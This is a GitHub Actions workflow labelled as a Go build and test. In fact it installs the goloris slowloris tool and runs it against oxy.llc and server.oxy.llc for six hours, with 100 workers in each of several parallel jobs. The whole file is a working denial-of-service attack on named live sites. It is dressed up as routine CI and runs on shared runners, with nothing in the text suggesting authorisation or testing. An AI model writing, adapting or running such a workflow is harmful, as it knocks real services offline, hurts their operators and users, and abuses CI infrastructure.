name: Go

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:
    runs-on: ubuntu-latest
    strategy:
     matrix: 
      site: ["https://oxy.llc/","https://oxy.llc/","https://oxy.llc/","https://oxy.llc/","https://oxy.llc/","https://oxy.llc/","https://server.oxy.llc/", "https://server.oxy.llc/"]
    steps:
    - uses: actions/checkout@v2

    - name: Set up Go
      uses: actions/setup-go@v2
      with:
        go-version: 1.17

    - name: Build
      run: go get -u github.com/valyala/goloris

    - name: Test
      run: goloris -victimUrl "${{ matrix.site }}" -dialWorkersCount 100 -testDuration 6h -rampUpInterval 100ms
